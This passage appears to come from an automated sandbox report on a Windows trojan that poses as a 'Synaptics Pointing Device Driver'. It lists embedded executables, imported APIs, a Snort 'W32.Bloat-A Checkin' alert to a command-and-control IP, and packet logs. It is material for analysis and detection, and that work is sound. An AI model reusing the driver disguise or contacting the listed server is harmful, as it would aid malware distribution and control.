                                                                                                                                                                                        RT_STRING0xb800c0x368data
                                                                                                                                                                                        RT_STRING0xb83740x3fcdata
                                                                                                                                                                                        RT_STRING0xb87700x2fcdata
                                                                                                                                                                                        RT_STRING0xb8a6c0x354data
                                                                                                                                                                                        RT_RCDATA0xb8dc00x44data
                                                                                                                                                                                        RT_RCDATA0xb8e040x10data
                                                                                                                                                                                        RT_RCDATA0xb8e140x338640PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        RT_RCDATA0x3f14540x3ASCII text, with no line terminatorsTurkishTurkey
                                                                                                                                                                                        RT_RCDATA0x3f14580x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey
                                                                                                                                                                                        RT_RCDATA0x3f50580x64cdata
                                                                                                                                                                                        RT_RCDATA0x3f56a40x153Delphi compiled form 'TFormVir'
                                                                                                                                                                                        RT_RCDATA0x3f57f80x47d3Microsoft Excel 2007+TurkishTurkey
                                                                                                                                                                                        RT_GROUP_CURSOR0x3f9fcc0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_CURSOR0x3f9fe00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_CURSOR0x3f9ff40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_CURSOR0x3fa0080x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_CURSOR0x3fa01c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_CURSOR0x3fa0300x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_CURSOR0x3fa0440x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                                                                                                        RT_GROUP_ICON0x3fa0580x14dataTurkishTurkey
                                                                                                                                                                                        RT_VERSION0x3fa06c0x304dataTurkishTurkey

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                                                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                        advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                                                                                        kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                        ole32.dllCLSIDFromString
                                                                                                                                                                                        kernel32.dllSleep
                                                                                                                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                        ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                                                                        oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                                                                        comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                        shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                                                                                        wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                                                                                        shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                                                                                        advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                                                                                        wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                                                                                        netapi32.dllNetbios

                                                                                                                                                                                        Version Infos

                                                                                                                                                                                        DescriptionData
                                                                                                                                                                                        LegalCopyright
                                                                                                                                                                                        InternalName
                                                                                                                                                                                        FileVersion1.0.0.4
                                                                                                                                                                                        CompanyNameSynaptics
                                                                                                                                                                                        LegalTrademarks
                                                                                                                                                                                        Comments
                                                                                                                                                                                        ProductNameSynaptics Pointing Device Driver
                                                                                                                                                                                        ProductVersion1.0.0.0
                                                                                                                                                                                        FileDescriptionSynaptics Pointing Device Driver
                                                                                                                                                                                        OriginalFilename
                                                                                                                                                                                        Translation0x041f 0x04e6

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        TurkishTurkey

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                        192.168.2.369.42.215.25249735802832617 05/17/22-13:31:29.115843TCP2832617ETPRO TROJAN W32.Bloat-A Checkin4973580192.168.2.369.42.215.252

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        May 17, 2022 13:31:21.343061924 CEST4973180192.168.2.3171.8.167.89
                                                                                                                                                                                        May 17, 2022 13:31:23.586749077 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.586810112 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.586963892 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.588809967 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.588870049 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.588948965 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.629851103 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.629897118 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.629945040 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.629986048 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.687438011 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.687531948 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.688158989 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.688236952 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.689156055 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.689234018 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:23.689565897 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:23.689635992 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:24.353646994 CEST4973180192.168.2.3171.8.167.89
                                                                                                                                                                                        May 17, 2022 13:31:28.675939083 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.675971985 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.676229954 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.676290989 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.676350117 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.676373005 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.676672935 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.676748037 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.680345058 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.680954933 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.696594954 CEST4973580192.168.2.369.42.215.252
                                                                                                                                                                                        May 17, 2022 13:31:28.720504045 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.724520922 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.869621038 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.869653940 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.869735956 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.869765997 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.869837999 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.871144056 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.871198893 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.871233940 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.871256113 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.871262074 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.871314049 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.871350050 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.871356964 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.871359110 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.871368885 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.871448994 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.871527910 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:28.884059906 CEST804973569.42.215.252192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:28.884202003 CEST4973580192.168.2.369.42.215.252
                                                                                                                                                                                        May 17, 2022 13:31:29.085290909 CEST49733443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.085330009 CEST44349733142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.087738991 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.087766886 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.087855101 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.111664057 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.111706018 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.115843058 CEST4973580192.168.2.369.42.215.252
                                                                                                                                                                                        May 17, 2022 13:31:29.123857975 CEST49732443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.123893976 CEST44349732142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.131872892 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.131906986 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.131994009 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.157751083 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.157947063 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.167504072 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.167522907 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.175447941 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.175473928 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.199697971 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.199717999 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.213211060 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.213326931 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.216458082 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.216500044 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.226115942 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.226138115 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.329132080 CEST804973569.42.215.252192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.329286098 CEST4973580192.168.2.369.42.215.252
                                                                                                                                                                                        May 17, 2022 13:31:29.351135015 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.351202011 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.351254940 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.351275921 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.351289034 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.351334095 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.351831913 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.351891041 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.351900101 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.351949930 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.404196978 CEST49736443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.404242992 CEST44349736142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.405805111 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.405858994 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.405953884 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.406527996 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.406546116 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.450802088 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.450927019 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.455401897 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.455432892 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489312887 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489384890 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489507914 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.489532948 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489546061 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.489655972 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.489742994 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489792109 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.489799023 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489823103 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.489842892 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.489866972 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.495002031 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.495028973 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.503794909 CEST49737443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.503834963 CEST44349737142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.505558968 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.505589962 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.505662918 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.506304979 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.506320953 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.554457903 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.556418896 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.570475101 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.570489883 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.579446077 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.579461098 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.647669077 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.647737026 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.647778988 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.647810936 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.647835016 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.647845030 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.647882938 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.647924900 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.650659084 CEST49739443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.650696993 CEST44349739142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.652966022 CEST49741443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.653023958 CEST44349741142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.653417110 CEST49741443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.654088974 CEST49741443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.654108047 CEST44349741142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.701755047 CEST44349741142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.701946974 CEST49741443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.714252949 CEST49741443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.714291096 CEST44349741142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.721853971 CEST49741443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.721890926 CEST44349741142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812102079 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812164068 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812272072 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.812305927 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812339067 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.812377930 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.812793970 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812859058 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.812869072 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812881947 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.812931061 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.828174114 CEST49740443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.828198910 CEST44349740142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.829910040 CEST49742443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.829941988 CEST44349742142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.830049038 CEST49742443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.830643892 CEST49742443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.830657005 CEST44349742142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.876678944 CEST44349742142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.876843929 CEST49742443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.882560015 CEST49742443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:29.882580996 CEST44349742142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:29.889722109 CEST49742443192.168.2.3142.250.186.46
